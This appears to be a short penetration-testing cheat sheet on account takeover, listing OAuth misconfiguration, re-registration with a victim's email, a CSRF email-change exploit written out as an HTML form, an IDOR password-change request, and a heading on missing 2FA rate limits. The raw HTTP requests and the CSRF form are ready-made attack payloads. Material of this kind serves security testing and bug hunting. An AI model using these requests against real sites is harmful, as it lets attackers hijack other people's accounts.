Account Takeover
-
Using OAuth Misconfiguration
- Victim has a account in evil.com
- Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
- Attacker changed his/her email to victim email.
- When the victim try to create an account on evil.com, it says the email already exists.
-
Try re-sign up using same email
POST /newaccount
[...]
[email protected]&password=1234
After sign up using victim email, try signup again but using different password
POST /newaccount
[...]
[email protected]&password=hacked
Source: Link
- via CSRF
- Create an account as an attacker and fill all the form, check your info in the Account Detail.
- Change the email and capture the request, then created a CSRF Exploit.
- The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victim’s account.
<html>
<body>
<form action="https://evil.com/user/change-email" method="POST">
<input type="hidden" value="[email protected]"/>
<input type="submit" value="Submit Request">
</form>
</body>
</html>
Source: Link
- Chaining with IDOR, for example
POST /changepassword.php
Host: site.com
[...]
userid=500&password=heked123
500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID
- No Rate Limit on 2FA